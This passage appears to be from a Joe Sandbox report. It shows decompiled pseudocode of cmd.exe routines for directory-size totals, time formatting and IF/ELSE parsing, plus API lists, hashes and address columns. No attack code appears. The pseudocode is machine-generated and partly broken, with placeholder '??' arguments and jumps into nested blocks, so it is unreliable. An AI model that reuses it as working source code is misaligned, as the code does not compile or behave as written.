                                    							_t149 = _t149 + 1;
                                    						} while (_t150 <= 0x11d1a18);
                                    						_t128 = _v560;
                                    						_t149 = _t149 | 0xffffffff;
                                    						goto L26;
                                    					}
                                    				}
                                    			}





















































                                    APIs
                                    • memset.MSVCRT ref: 011DE090
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • wcschr.MSVCRT ref: 011DE0F3
                                    • wcschr.MSVCRT ref: 011DE10B
                                    • _wcsicmp.MSVCRT ref: 011DE179
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE1ED
                                    • iswspace.MSVCRT ref: 011DE28B
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00007FE7,?,?,00000000), ref: 011DE2ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memsetwcschr$AttributesFile_wcsicmpiswspace
                                    • String ID: :.\$=,;$=,;+/[] "
                                    • API String ID: 313872294-843887632
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 52%
                                    			E011DB89C(WCHAR* __ecx, short* __edx, signed int _a4) {
                                    				signed int _v12;
                                    				int _v24;
                                    				char _v28;
                                    				void* _v32;
                                    				void _v552;
                                    				struct _WIN32_FIND_DATAW _v1144;
                                    				int _v1148;
                                    				signed int _v1152;
                                    				void* _v1156;
                                    				char _v1160;
                                    				intOrPtr _v1164;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t71;
                                    				intOrPtr _t74;
                                    				void* _t76;
                                    				intOrPtr _t78;
                                    				intOrPtr _t79;
                                    				signed char _t80;
                                    				short _t83;
                                    				short _t84;
                                    				void* _t86;
                                    				signed int _t87;
                                    				signed int _t88;
                                    				signed int _t96;
                                    				signed int _t97;
                                    				intOrPtr _t98;
                                    				signed int _t99;
                                    				intOrPtr _t110;
                                    				signed int _t116;
                                    				WCHAR* _t119;
                                    				intOrPtr* _t124;
                                    				WCHAR* _t129;
                                    				signed int _t131;
                                    				intOrPtr* _t134;
                                    				signed int _t135;
                                    				intOrPtr* _t138;
                                    				signed int _t140;
                                    				signed int _t144;
                                    				short* _t146;
                                    				void* _t148;
                                    				short* _t150;
                                    				void* _t151;
                                    				int _t154;
                                    				intOrPtr* _t155;
                                    				void* _t159;
                                    				signed int _t160;
                                    				void* _t161;
                                    
                                    				_t145 = __edx;
                                    				_t71 =  *0x11fd0b4; // 0x2833377e
                                    				_v12 = _t71 ^ _t160;
                                    				_t119 = __ecx;
                                    				_v1152 = _a4;
                                    				_t155 = __ecx;
                                    				_v1148 = 0;
                                    				_t150 =  &(__ecx[1]);
                                    				do {
                                    					_t74 =  *_t155;
                                    					_t155 = _t155 + 2;
                                    				} while (_t74 != 0);
                                    				_t157 = _t155 - _t150 >> 1;
                                    				if((_t155 - _t150 >> 1) + 2 > __edx) {
                                    					L10:
                                    					_t76 = 0;
                                    					L8:
                                    					_pop(_t151);
                                    					return E011E6FD0(_t76, _t119, _v12 ^ _t160, _t145, _t151, _t157);
                                    				}
                                    				_t124 = __ecx;
                                    				_t145 =  &(__ecx[1]);
                                    				do {
                                    					_t78 =  *_t124;
                                    					_t124 = _t124 + 2;
                                    				} while (_t78 != 0);
                                    				_t157 = _v1152;
                                    				_t126 = _t124 - _t145 >> 1;
                                    				_t79 = (_t124 - _t145 >> 1) - 2;
                                    				_v1164 = _t79;
                                    				 *_t157 = _t79;
                                    				_t80 = GetFileAttributesW(__ecx);
                                    				if(_t80 == 0xffffffff) {
                                    					_push(0);
                                    					_push(GetLastError());
                                    					E011DC5A2(_t126);
                                    					goto L10;
                                    				}
                                    				if((_t80 & 0x00000010) != 0) {
                                    					_t129 = _t119;
                                    					_t146 =  &(_t129[1]);
                                    					do {
                                    						_t83 =  *_t129;
                                    						_t129 =  &(_t129[1]);
                                    					} while (_t83 != 0);
                                    					_t131 = _t129 - _t146 >> 1;
                                    					_t84 = 0x5c;
                                    					_push(0x2a);
                                    					if( *((intOrPtr*)(_t119 + _t131 * 2 - 2)) != _t84) {
                                    						 *((short*)(_t119 + 4 + _t131 * 2)) = 0;
                                    						_pop(_t145);
                                    					} else {
                                    						_t145 = 0;
                                    						_pop(_t84);
                                    					}
                                    					_t119[_t131] = _t84;
                                    					 *(_t119 + 2 + _t131 * 2) = _t145;
                                    					_t86 = FindFirstFileW(_t119,  &_v1144);
                                    					_v1156 = _t86;
                                    					if(_t86 != 0xffffffff) {
                                    						_t154 = 1;
                                    						do {
                                    							_t131 = ".";
                                    							_t87 =  &(_v1144.cFileName);
                                    							while(1) {
                                    								_t145 =  *_t87;
                                    								if(_t145 !=  *_t131) {
                                    									break;
                                    								}
                                    								if(_t145 == 0) {
                                    									L26:
                                    									_t88 = 0;
                                    									L28:
                                    									if(_t88 == 0) {
                                    										goto L57;
                                    									}
                                    									_t131 = L"..";
                                    									_t96 =  &(_v1144.cFileName);
                                    									while(1) {
                                    										_t145 =  *_t96;
                                    										if(_t145 !=  *_t131) {
                                    											break;
                                    										}
                                    										if(_t145 == 0) {
                                    											L34:
                                    											_t97 = 0;
                                    											L36:
                                    											if(_t97 == 0) {
                                    												goto L57;
                                    											}
                                    											_t134 =  &(_v1144.cFileName);
                                    											_t145 = _t134 + 2;
                                    											do {
                                    												_t98 =  *_t134;
                                    												_t134 = _t134 + 2;
                                    											} while (_t98 != _v1148);
                                    											_t135 = _t134 - _t145;
                                    											_t131 = _t135 >> 1;
                                    											if(_t135 == 0) {
                                    												goto L57;
                                    											}
                                    											if((_v1144.dwFileAttributes & 0x00000010) != 0) {
                                    												_t99 =  *_t157;
                                    												if(_t99 <= _t131) {
                                    													_t99 = _t131;
                                    												}
                                    												 *_t157 = _t99;
                                    												goto L57;
                                    											}
                                    											_v28 = 1;
                                    											_v32 = 0;
                                    											_v24 = 0x104;
                                    											memset( &_v552, 0, 0x104);
                                    											_t161 = _t161 + 0xc;
                                    											if(E011E0C70( &_v552, ((0 | _v28 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    												SetLastError(8);
                                    												L60:
                                    												__imp__??_V@YAXPAX@Z(_v32);
                                    												_pop(_t131);
                                    												L61:
                                    												_t157 = GetLastError();
                                    												FindClose(_v1156);
                                    												if(_t154 != 0) {
                                    													goto L10;
                                    												}
                                    												if(_t157 == 0x12) {
                                    													goto L7;
                                    												}
                                    												_push(0);
                                    												goto L64;
                                    											}
                                    											E011E0D89(_t145, _t119);
                                    											_t148 = _v32;
                                    											_t138 = _t148;
                                    											if(_t148 == 0) {
                                    												_t138 =  &_v552;
                                    											}
                                    											_t159 = _t138 + 2;
                                    											do {
                                    												_t110 =  *_t138;
                                    												_t138 = _t138 + 2;
                                    											} while (_t110 != _v1148);
                                    											_t140 = _t138 - _t159 >> 1;
                                    											if(_t148 == 0) {
                                    												_t148 =  &_v552;
                                    											}
                                    											 *((short*)(_t148 + _t140 * 2 - 2)) = 0;
                                    											E011E0CF2(_t148,  &(_v1144.cFileName));
                                    											_t142 = _v32;
                                    											if(_v32 == 0) {
                                    												_t142 =  &_v552;
                                    											}
                                    											_t145 = _v24;
                                    											if(E011DB89C(_t142, _v24,  &_v1160) == 0) {
                                    												goto L60;
                                    											} else {
                                    												_t157 = _v1152;
                                    												_t144 = _v1164 + _v1160;
                                    												_t116 =  *_t157;
                                    												if(_t116 <= _t144) {
                                    													_t116 = _t144;
                                    												}
                                    												 *_t157 = _t116;
                                    												__imp__??_V@YAXPAX@Z(_v32);
                                    												_pop(_t131);
                                    												goto L57;
                                    											}
                                    										}
                                    										_t145 =  *((intOrPtr*)(_t96 + 2));
                                    										_t33 = _t131 + 2; // 0x2e
                                    										if(_t145 !=  *_t33) {
                                    											break;
                                    										}
                                    										_t96 = _t96 + 4;
                                    										_t131 = _t131 + 4;
                                    										if(_t145 != 0) {
                                    											continue;
                                    										}
                                    										goto L34;
                                    									}
                                    									asm("sbb eax, eax");
                                    									_t97 = _t96 | 0x00000001;
                                    									goto L36;
                                    								}
                                    								_t145 =  *((intOrPtr*)(_t87 + 2));
                                    								_t30 = _t131 + 2; // 0x200000
                                    								if(_t145 !=  *_t30) {
                                    									break;
                                    								}
                                    								_t87 = _t87 + 4;
                                    								_t131 = _t131 + 4;
                                    								if(_t145 != 0) {
                                    									continue;
                                    								}
                                    								goto L26;
                                    							}
                                    							asm("sbb eax, eax");
                                    							_t88 = _t87 | 0x00000001;
                                    							goto L28;
                                    							L57:
                                    							_t154 = FindNextFileW(_v1156,  &_v1144);
                                    						} while (_t154 != 0);
                                    						goto L61;
                                    					} else {
                                    						_t157 = GetLastError();
                                    						FindClose(0xffffffff);
                                    						if(_t157 == 2 || _t157 == 0x12) {
                                    							goto L7;
                                    						} else {
                                    							_push(0);
                                    							L64:
                                    							_push(_t157);
                                    							E011DC5A2(_t131);
                                    							_t76 = 0;
                                    							goto L8;
                                    						}
                                    					}
                                    				}
                                    				L7:
                                    				_t76 = 1;
                                    				goto L8;
                                    			}
                                    0x011e9eee
                                    0x011e9efb
                                    0x011e9f14
                                    0x011e9fe1
                                    0x011e9fe7
                                    0x011e9fea
                                    0x011e9ff0
                                    0x011e9ff1
                                    0x011e9ffd
                                    0x011e9fff
                                    0x011ea007
                                    0x00000000
                                    0x00000000
                                    0x011ea010
                                    0x00000000
                                    0x00000000
                                    0x011ea018
                                    0x00000000
                                    0x011ea018
                                    0x011e9f21
                                    0x011e9f26
                                    0x011e9f29
                                    0x011e9f2d
                                    0x011e9f2f
                                    0x011e9f2f
                                    0x011e9f35
                                    0x011e9f38
                                    0x011e9f38
                                    0x011e9f3b
                                    0x011e9f3e
                                    0x011e9f49
                                    0x011e9f4d
                                    0x011e9f4f
                                    0x011e9f4f
                                    0x011e9f57
                                    0x011e9f69
                                    0x011e9f6e
                                    0x011e9f73
                                    0x011e9f75
                                    0x011e9f75
                                    0x011e9f7b
                                    0x011e9f8c
                                    0x00000000
                                    0x011e9f8e
                                    0x011e9f8e
                                    0x011e9f9a
                                    0x011e9fa0
                                    0x011e9fa4
                                    0x011e9fa6
                                    0x011e9fa6
                                    0x011e9fab
                                    0x011e9fad
                                    0x011e9fb3
                                    0x00000000
                                    0x011e9fb3
                                    0x011e9f8c
                                    0x011e9e7f
                                    0x011e9e83
                                    0x011e9e87
                                    0x00000000
                                    0x00000000
                                    0x011e9e89
                                    0x011e9e8c
                                    0x011e9e92
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e9e92
                                    0x011e9e98
                                    0x011e9e9a
                                    0x00000000
                                    0x011e9e9a
                                    0x011e9e41
                                    0x011e9e45
                                    0x011e9e49
                                    0x00000000
                                    0x00000000
                                    0x011e9e4b
                                    0x011e9e4e
                                    0x011e9e54
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e9e54
                                    0x011e9e5a
                                    0x011e9e5c
                                    0x00000000
                                    0x011e9fc0
                                    0x011e9fd3
                                    0x011e9fd5
                                    0x00000000
                                    0x011e9dfe
                                    0x011e9e06
                                    0x011e9e08
                                    0x011e9e11
                                    0x00000000
                                    0x011e9e20
                                    0x011e9e20
                                    0x011ea019
                                    0x011ea019
                                    0x011ea01a
                                    0x011ea020
                                    0x00000000
                                    0x011ea022
                                    0x011e9e11
                                    0x011e9dfc
                                    0x011db925
                                    0x011db927
                                    0x00000000

                                    APIs
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FE7,00000000), ref: 011DB90E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 4527101172f83b501611864d7501998ab0620b3570cfab8cfee1841df50d60d9
                                    • Instruction ID: 03a1585ae39d91d889194c503c58d7a2b4bc2695e7d62243d6e44f0e521deefa
                                    • Opcode Fuzzy Hash: 4527101172f83b501611864d7501998ab0620b3570cfab8cfee1841df50d60d9
                                    • Instruction Fuzzy Hash: D891257290051A8BDF2DDFA8C8486FEB7F1EF54218F4585ADDA0AD7244FB319A81CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E011D96A0(void* __ecx, void* __edx, signed int _a4, unsigned int _a8) {
                                    				signed int _v8;
                                    				short _v76;
                                    				short _v332;
                                    				signed short _v334;
                                    				signed short _v336;
                                    				signed int _v338;
                                    				signed int _v340;
                                    				struct _SYSTEMTIME _v348;
                                    				signed int _v352;
                                    				intOrPtr _v356;
                                    				void* _v360;
                                    				struct _FILETIME _v368;
                                    				struct _FILETIME _v376;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t58;
                                    				char* _t67;
                                    				signed int _t73;
                                    				signed int _t74;
                                    				signed int _t76;
                                    				signed int _t79;
                                    				signed short _t80;
                                    				signed int _t85;
                                    				signed int _t88;
                                    				signed int _t92;
                                    				signed int _t99;
                                    				void* _t106;
                                    				void* _t111;
                                    				signed int _t112;
                                    				signed int _t114;
                                    				void* _t116;
                                    				void* _t119;
                                    				signed int _t121;
                                    				signed int _t122;
                                    				void* _t123;
                                    				signed int _t124;
                                    				signed int _t126;
                                    				signed int _t127;
                                    				intOrPtr* _t131;
                                    				void* _t133;
                                    				int _t134;
                                    				void* _t136;
                                    				signed int _t138;
                                    				signed int _t140;
                                    				signed int _t141;
                                    				void* _t142;
                                    
                                    				_t58 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t58 ^ _t141;
                                    				_t139 = _a4;
                                    				_t136 = __edx;
                                    				if(__ecx != 0) {
                                    					E011F3C49(__ecx,  &_v368);
                                    				} else {
                                    					GetSystemTime( &_v348);
                                    					SystemTimeToFileTime( &_v348,  &_v368);
                                    				}
                                    				FileTimeToLocalFileTime( &_v368,  &_v376);
                                    				FileTimeToSystemTime( &_v376,  &_v348);
                                    				if(_t136 != 1) {
                                    					__eflags =  *0x1213cc9;
                                    					if( *0x1213cc9 == 0) {
                                    						__eflags =  *0x11fd0cc;
                                    						_t67 = "a";
                                    						_t114 = _v340 & 0x0000ffff;
                                    						if( *0x11fd0cc == 0) {
                                    							_t67 = " ";
                                    						} else {
                                    							__eflags = _t114 - 0xc;
                                    							if(__eflags < 0) {
                                    								__eflags = _t114;
                                    								if(_t114 == 0) {
                                    									_t114 = 0xc;
                                    								}
                                    							} else {
                                    								if(__eflags > 0) {
                                    									__eflags = _t114;
                                    								}
                                    								_t67 = "p";
                                    							}
                                    						}
                                    						_push(_t67);
                                    						_push(_v338 & 0x0000ffff);
                                    						_push(0x11ff81c);
                                    						E011E274C( &_v76, 0x20, L"%02d%s%02d%s", _t114);
                                    						L48:
                                    						__eflags = _t139;
                                    						if(_t139 != 0) {
                                    							_t130 = _a8;
                                    							E011E1040(_t139, _a8,  &_v76);
                                    							_t116 = _t139 + 2;
                                    							do {
                                    								_t73 =  *_t139;
                                    								_t139 = _t139 + 2;
                                    								__eflags = _t73;
                                    							} while (_t73 != 0);
                                    							goto L6;
                                    						}
                                    						_t131 =  &_v76;
                                    						_t119 = _t131 + 2;
                                    						do {
                                    							_t76 =  *_t131;
                                    							_t131 = _t131 + 2;
                                    							__eflags = _t76;
                                    						} while (_t76 != 0);
                                    						_t130 = _t131 - _t119 >> 1;
                                    						_t74 = E011E2616( &_v76, _t131 - _t119 >> 1);
                                    						goto L7;
                                    					}
                                    					_v352 = 0;
                                    					_t79 = GetLocaleInfoW(E011E41A4(), 0x1003,  &_v332, 0x80);
                                    					__eflags = _t79;
                                    					if(_t79 != 0) {
                                    						L20:
                                    						_t80 = _v332;
                                    						_t136 =  &_v332;
                                    						__eflags = _t80;
                                    						if(_t80 == 0) {
                                    							L37:
                                    							_t85 = GetTimeFormatW(E011E41A4(), 2,  &_v348,  &_v332,  &_v76, 0x20);
                                    							__eflags = _t85;
                                    							if(_t85 == 0) {
                                    								_v76 = _t85;
                                    							}
                                    							goto L48;
                                    						}
                                    						_t112 = _t80 & 0x0000ffff;
                                    						_t121 = 0;
                                    						__eflags = 0;
                                    						do {
                                    							__eflags = _t112 - 0x27;
                                    							if(_t112 != 0x27) {
                                    								__eflags = _t121;
                                    								if(_t121 == 0) {
                                    									__eflags = _t112 - 0x68;
                                    									if(_t112 == 0x68) {
                                    										L29:
                                    										_t122 = 0;
                                    										__eflags = 0;
                                    										do {
                                    											_t136 = _t136 + 2;
                                    											_t122 = _t122 + 1;
                                    											__eflags =  *_t136 - _t112;
                                    										} while ( *_t136 == _t112);
                                    										_t133 = _t136 +  ~_t122 * 2;
                                    										_v360 = _t133;
                                    										_t136 = _t133 + 2;
                                    										__eflags = _t122 - 1;
                                    										if(_t122 != 1) {
                                    											L35:
                                    											_t121 = _v352;
                                    											goto L36;
                                    										}
                                    										_t123 = _t133;
                                    										_v356 = _t123 + 2;
                                    										do {
                                    											_t92 =  *_t123;
                                    											_t123 = _t123 + 2;
                                    											__eflags = _t92;
                                    										} while (_t92 != 0);
                                    										_t124 = _t123 - _v356;
                                    										__eflags = _t124;
                                    										memmove(_t136, _t133, 2 + (_t124 >> 1) * 2);
                                    										_t142 = _t142 + 0xc;
                                    										 *_v360 = _t112;
                                    										goto L35;
                                    									}
                                    									__eflags = _t112 - 0x48;
                                    									if(_t112 == 0x48) {
                                    										goto L29;
                                    									}
                                    									__eflags = _t112 - 0x6d;
                                    									if(_t112 != 0x6d) {
                                    										goto L36;
                                    									}
                                    									goto L29;
                                    								}
                                    								_t136 = _t136 + 2;
                                    								goto L36;
                                    							}
                                    							_t136 = _t136 + 2;
                                    							__eflags = _t121;
                                    							_t121 = 0 | _t121 == 0x00000000;
                                    							_v352 = _t121;
                                    							L36:
                                    							_t88 =  *(_t136 + 2) & 0x0000ffff;
                                    							_t136 = _t136 + 2;
                                    							_t112 = _t88;
                                    							__eflags = _t88;
                                    						} while (_t88 != 0);
                                    						goto L37;
                                    					}
                                    					_t126 =  &_v332;
                                    					_t134 = 0x80;
                                    					_t138 = L"HH:mm:ss t" - _t126;
                                    					__eflags = _t138;
                                    					while(1) {
                                    						_t25 = _t134 + 0x7fffff7e; // 0x7ffffffe
                                    						__eflags = _t25;
                                    						if(_t25 == 0) {
                                    							break;
                                    						}
                                    						_t99 =  *(_t138 + _t126) & 0x0000ffff;
                                    						__eflags = _t99;
                                    						if(_t99 == 0) {
                                    							break;
                                    						}
                                    						 *_t126 = _t99;
                                    						_t126 = _t126 + 2;
                                    						_t134 = _t134 - 1;
                                    						__eflags = _t134;
                                    						if(_t134 != 0) {
                                    							continue;
                                    						}
                                    						L18:
                                    						_t126 = _t126 - 2;
                                    						__eflags = _t126;
                                    						L19:
                                    						__eflags = 0;
                                    						 *_t126 = 0;
                                    						goto L20;
                                    					}
                                    					__eflags = _t134;
                                    					if(_t134 != 0) {
                                    						goto L19;
                                    					}
                                    					goto L18;
                                    				} else {
                                    					_t127 = _v334 & 0x0000ffff;
                                    					_t130 = 0xcccccccd * _t127 >> 0x20 >> 3;
                                    					_push(0xcccccccd * _t127 >> 0x20 >> 3);
                                    					_push(0x11ff7fc);
                                    					_push(_v336 & 0x0000ffff);
                                    					_push(0x11ff81c);
                                    					_push(_v338 & 0x0000ffff);
                                    					_push(0x11ff81c);
                                    					_push(_v340 & 0x0000ffff);
                                    					_push(L"%2d%s%02d%s%02d%s%02d");
                                    					if(_t139 == 0) {
                                    						_t74 = E011E25D9();
                                    						L7:
                                    						return E011E6FD0(_t74, _t111, _v8 ^ _t141, _t130, _t136, _t139);
                                    					} else {
                                    						_push(_a8);
                                    						_push(_t139);
                                    						E011E274C();
                                    						_t116 = _t139 + 2;
                                    						do {
                                    							_t106 =  *_t139;
                                    							_t139 = _t139 + 2;
                                    						} while (_t106 != 0);
                                    						L6:
                                    						_t140 = _t139 - _t116;
                                    						_t139 = _t140 >> 1;
                                    						_t74 = _t140 >> 1;
                                    						goto L7;
                                    					}
                                    				}
                                    			}


















































                                    0x011d977f
                                    0x00000000
                                    0x011d977f
                                    0x011d9757

                                    APIs
                                    • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D96CC
                                    • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D96E0
                                    • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D96F4
                                    • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D9708
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 011F0B1B
                                    • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 011F0C43
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Time$File$System$FormatInfoLocalLocale
                                    • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                    • API String ID: 55602301-2516506544
                                    • Opcode ID: d934bdcb8319a6cec73d4b6ba420af93533aa4ae2e44a50143315b30351467ba
                                    • Instruction ID: dd12c86237fe8f982918843d00b74af6a34bff32662dbf0263de2fd5a8333ffa
                                    • Opcode Fuzzy Hash: d934bdcb8319a6cec73d4b6ba420af93533aa4ae2e44a50143315b30351467ba
                                    • Instruction Fuzzy Hash: B981D275A0061A9ADF2CDF59CC54BFA73B9AF48704F04419EFA0AE7142EB309A85CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 62%
                                    			E011DD803(void* __eax, WCHAR* __ebx, void* __ecx) {
                                    				void* __edi;
                                    				void* __esi;
                                    				short _t56;
                                    				short _t57;
                                    				signed int _t59;
                                    				intOrPtr* _t62;
                                    				intOrPtr _t63;
                                    				signed int _t66;
                                    				signed int _t68;
                                    				signed int _t71;
                                    				void* _t72;
                                    				void* _t73;
                                    				void* _t75;
                                    				signed int _t76;
                                    				void* _t81;
                                    				signed int _t85;
                                    				signed int _t86;
                                    				WCHAR* _t90;
                                    				signed int _t91;
                                    				void* _t92;
                                    				WCHAR* _t93;
                                    				signed int _t100;
                                    				WCHAR* _t104;
                                    				void* _t105;
                                    				void* _t110;
                                    				void* _t114;
                                    				signed int _t118;
                                    				signed int _t125;
                                    				WCHAR* _t132;
                                    				void* _t138;
                                    				signed int _t140;
                                    				void* _t144;
                                    				void* _t150;
                                    				void* _t156;
                                    				WCHAR* _t157;
                                    				void* _t160;
                                    				signed int _t162;
                                    				signed int _t165;
                                    				signed int _t166;
                                    				void* _t167;
                                    				void* _t168;
                                    				void* _t170;
                                    				signed int _t171;
                                    				signed int _t173;
                                    				void* _t174;
                                    				signed int _t175;
                                    				signed int _t177;
                                    				signed int _t180;
                                    
                                    				_t104 = __ebx;
                                    				_t157 = 0;
                                    				__imp___wcsicmp(L"IF/?", 0x120faa0, _t156, _t170, __ecx);
                                    				_t186 = __eax;
                                    				if(__eax == 0) {
                                    					 *0x120faa4 = 0;
                                    					_t157 = 1;
                                    				}
                                    				_t110 = 0x2c;
                                    				_t171 = E011DE9A0(_t110, _t186);
                                    				if(_t157 != 0) {
                                    					_t56 = 0x2f;
                                    					 *0x120faa0 = _t56;
                                    					_t57 = 0x3f;
                                    					 *0x120faa2 = _t57;
                                    					 *0x120faa4 = 0;
                                    				} else {
                                    					E011DF030(0);
                                    				}
                                    				_t149 = 0x2c;
                                    				_t59 = E011DDCE1(_t104, _t149, _t157);
                                    				if(_t59 != 0) {
                                    					 *(_t171 + 0x38) =  *(_t171 + 0x38) & 0x00000000;
                                    					 *_t171 = 0x3c;
                                    					goto L13;
                                    				} else {
                                    					_t160 = 0;
                                    					if( *0x1213cc9 == _t59) {
                                    						L6:
                                    						_t149 = 0;
                                    						E011DF300(_t59, 0, 0, 0);
                                    					} else {
                                    						__imp___wcsicmp(0x120faa0, L"/I");
                                    						if(_t59 == 0) {
                                    							_t160 = 1;
                                    						} else {
                                    							goto L6;
                                    						}
                                    					}
                                    					_t62 = E011DCDA2(0);
                                    					 *((intOrPtr*)(_t171 + 0x3c)) = _t62;
                                    					if(_t62 != 0 && _t160 != 0) {
                                    						__eflags =  *_t62 - 0x38;
                                    						if( *_t62 == 0x38) {
                                    							_t62 =  *((intOrPtr*)(_t62 + 0x3c));
                                    						}
                                    						 *((intOrPtr*)(_t62 + 0x40)) = 2;
                                    					}
                                    					_t114 = 0x2c;
                                    					_t63 = E011DDC74(_t104, _t114);
                                    					 *((intOrPtr*)(_t171 + 0x40)) = _t63;
                                    					if(_t63 == 0) {
                                    						E011F82EB(_t114);
                                    					}
                                    					if(E011DEEC8() == 0) {
                                    						L13:
                                    						return _t171;
                                    					} else {
                                    						_t66 = E011DF030(0);
                                    						__imp___wcsicmp(L"ELSE", 0x120faa0);
                                    						if(_t66 == 0) {
                                    							_t118 =  *0x120fa8c +  *0x120fa8c;
                                    							_t68 = E011E00B0(_t118);
                                    							__eflags = _t68;
                                    							if(_t68 == 0) {
                                    								E011F9287(_t118);
                                    								__imp__longjmp(0x120b8b8, 1);
                                    								asm("int3");
                                    								while(1) {
                                    									L58:
                                    									 *((short*)(_t149 + _t118 * 2)) = 0;
                                    									while(1) {
                                    										_t71 =  *(_t171 + 0x14);
                                    										_t171 = _t71;
                                    										__eflags = _t71;
                                    										if(_t71 == 0) {
                                    											break;
                                    										}
                                    										_t119 =  *(_t171 + 4);
                                    										_t162 =  *(_t171 + 4);
                                    										_t150 = _t162 + 2;
                                    										do {
                                    											_t72 =  *_t162;
                                    											_t162 = _t162 + 2;
                                    											__eflags = _t72 - _t104;
                                    										} while (_t72 != _t104);
                                    										_t73 = E011E22C0(_t104, _t119);
                                    										_t149 = (_t162 - _t150 >> 1) + 1;
                                    										E011E1040( *(_t171 + 4), (_t162 - _t150 >> 1) + 1, _t73);
                                    										__eflags =  *((intOrPtr*)(_t171 + 8)) - _t104;
                                    										if( *((intOrPtr*)(_t171 + 8)) == _t104) {
                                    											_t149 =  *(_t171 + 4);
                                    											_t140 = _t149;
                                    											_t168 = _t140 + 2;
                                    											do {
                                    												_t75 =  *_t140;
                                    												_t140 = _t140 + 2;
                                    												__eflags = _t75 - _t104;
                                    											} while (_t75 != _t104);
                                    											_t118 = (_t140 - _t168 >> 1) - 1;
                                    											__eflags = _t118 - 1;
                                    											if(_t118 > 1) {
                                    												__eflags =  *((short*)(_t149 + _t118 * 2)) - 0x3a;
                                    												if( *((short*)(_t149 + _t118 * 2)) == 0x3a) {
                                    													goto L58;
                                    												}
                                    											}
                                    										}
                                    									}
                                    									_t165 =  *(_t180 - 0x228);
                                    									_t173 =  *(_t180 - 0x224);
                                    									__eflags = _t173 - 3;
                                    									if(_t173 == 3) {
                                    										_t76 =  *0x1213cd4;
                                    										 *(_t180 - 0x228) = _t76;
                                    										goto L33;
                                    									} else {
                                    										_t138 = 0x10;
                                    										_t76 = E011E00B0(_t138);
                                    										 *(_t180 - 0x228) = _t76;
                                    										__eflags = _t76;
                                    										if(_t76 == 0) {
                                    											L52:
                                    											_t104 = 1;
                                    										} else {
                                    											 *(_t76 + 0xc) =  *0x1213cd4;
                                    											 *0x1213cd4 = _t76;
                                    											 *(_t76 + 8) = _t165;
                                    											 *_t76 = _t173;
                                    											L33:
                                    											_t166 =  *(_t165 + 0x34);
                                    											__eflags = _t166;
                                    											if(_t166 != 0) {
                                    												_t175 = _t173 | 0xffffffff;
                                    												__eflags = _t175;
                                    												do {
                                    													__eflags =  *(_t166 + 8) - _t104;
                                    													if( *(_t166 + 8) != _t104) {
                                    														goto L48;
                                    													} else {
                                    														__imp___get_osfhandle( *_t166);
                                    														__eflags = _t76 - _t175;
                                    														if(_t76 == _t175) {
                                    															L63:
                                    															 *(_t166 + 8) = _t175;
                                    															goto L41;
                                    														} else {
                                    															__imp___get_osfhandle( *_t166);
                                    															__eflags = _t76 - 0xfffffffe;
                                    															if(_t76 == 0xfffffffe) {
                                    																goto L63;
                                    															} else {
                                    																_t92 = E011E0178(_t76);
                                    																__eflags = _t92;
                                    																if(_t92 == 0) {
                                    																	_t92 = E011F9953(_t92,  *_t166);
                                    																	__eflags = _t92;
                                    																	if(_t92 != 0) {
                                    																		goto L39;
                                    																	} else {
                                    																		__imp___get_osfhandle( *_t166, _t104, _t104, 1);
                                    																		_pop(_t136);
                                    																		_t92 = SetFilePointer(_t92, ??, ??, ??);
                                    																		__eflags = _t92 - _t175;
                                    																		if(_t92 != _t175) {
                                    																			goto L39;
                                    																		} else {
